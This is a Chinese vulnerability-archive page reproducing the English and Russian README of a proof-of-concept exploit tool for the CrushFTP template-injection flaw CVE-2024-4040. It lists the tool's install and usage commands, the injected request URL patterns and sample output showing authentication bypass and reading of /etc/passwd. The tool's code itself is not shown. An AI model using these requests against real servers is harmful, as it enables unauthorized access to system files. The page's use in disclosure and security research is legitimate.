POC详情: df23b6ead7bc6c841740d21478f47da3dcbe2270

来源
关联漏洞
标题: CrushFTP 代码注入漏洞 (CVE-2024-4040)
描述:CrushFTP是一款文件传输服务器。 CrushFTP 10.7.1 和 11.1.0 之前版本存在安全漏洞,该漏洞源于允许低权限的远程攻击者从 VFS 沙箱之外的文件系统读取文件。
描述
is a PoC for CVE-2024-4040 tool for exploiting the SSTI vulnerability in CrushFTP
介绍

# EN
**GenCrushSSTIExploit** is a PoC exploit tool targeting the `SSTI` (Server-Side Template Injection) vulnerability in CrushFTP `CVE-2024-4040`. This tool demonstrates how to exploit this vulnerability for educational and ethical hacking purposes only. 

## Features
- Establishes a session with the CrushFTP server to extract authentication cookies.
- Exploits the SSTI vulnerability to inject payloads.
- Attempts to bypass authentication and extract sensitive files from the server.
- Uses `rich` for beautiful and styled console output.

## Disclaimer
**⚠️ Use this tool responsibly! It is intended for research and educational purposes only. The author is not responsible for any misuse or damage caused by this tool.**


## Installation
### Prerequisites
- Python 3.7+
- `pip` (Python package installer)

### Clone the Repository
```bash
git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit
```

### Install Required Packages
```bash
pip install -r requirements.txt
```

---

## Usage
### Basic Command
```bash
python GenCrushSSTIExploit.py -t <TARGET_URL>
```

- **`-t / --target`**: Specifies the target URL of the vulnerable CrushFTP server.

### Optional Parameters
- **`-l / --lfi`**: Local File Inclusion. Specifies the file to be included for extraction.
- **`-w / --wordlist`**: Specifies a wordlist for brute-forcing file paths.

## Example
```bash
python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd
```

## Example Output

```
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------

[*] Подключение к ServerSessionAJAX...

[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987

[*] Попытка эксплуатации уязвимости SSTI...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a

[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com

[*] Попытка обхода аутентификации...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a

[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...
```

# RU
**GenCrushSSTIExploit** — это PoC инструмент эксплуатации уязвимости `SSTI` (Server-Side Template Injection) в CrushFTP `CVE-2024-4040`. Этот инструмент демонстрирует, как использовать данную уязвимость в образовательных и этических целях.

## Возможности
- Устанавливает сессию с сервером CrushFTP для извлечения куки аутентификации.
- Эксплуатирует уязвимость SSTI для внедрения полезных нагрузок.
- Пытается обойти аутентификацию и извлечь конфиденциальные файлы с сервера.
- Использует `rich` для красивого и стилизованного вывода на консоль.

## Отказ от ответственности
**⚠️ Используйте этот инструмент ответственно! Он предназначен только для исследований и образовательных целей. Автор не несет ответственности за любое неправильное использование или ущерб, причиненный этим инструментом.**


## Установка
### Предварительные требования
- Python 3.7+
- `pip` (менеджер пакетов Python)

### Клонирование репозитория
```bash
git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit
```

### Установка необходимых пакетов
```bash
pip install -r requirements.txt
```

---

## Использование
### Основная команда
```bash
python GenCrushSSTIExploit.py -t <ЦЕЛЕВОЙ_URL>
```

- **`-t / --target`**: Указывает целевой URL уязвимого сервера CrushFTP.

### Дополнительные параметры
- **`-l / --lfi`**: Включение локального файла. Указывает файл для извлечения.
- **`-w / --wordlist`**: Указывает словарь для перебора путей к файлам.

## Пример
```bash
python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd
```

## Пример вывода

```
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------

[*] Подключение к ServerSessionAJAX...

[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987

[*] Попытка эксплуатации уязвимости SSTI...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a

[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com

[*] Попытка обхода аутентификации...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a

[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...
```
文件快照

[4.0K] /data/pocs/df23b6ead7bc6c841740d21478f47da3dcbe2270 ├── [9.5K] GenCrushSSTIExploit.py ├── [1.0K] LICENSE ├── [6.1K] README.md └── [ 14] requirements.txt 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。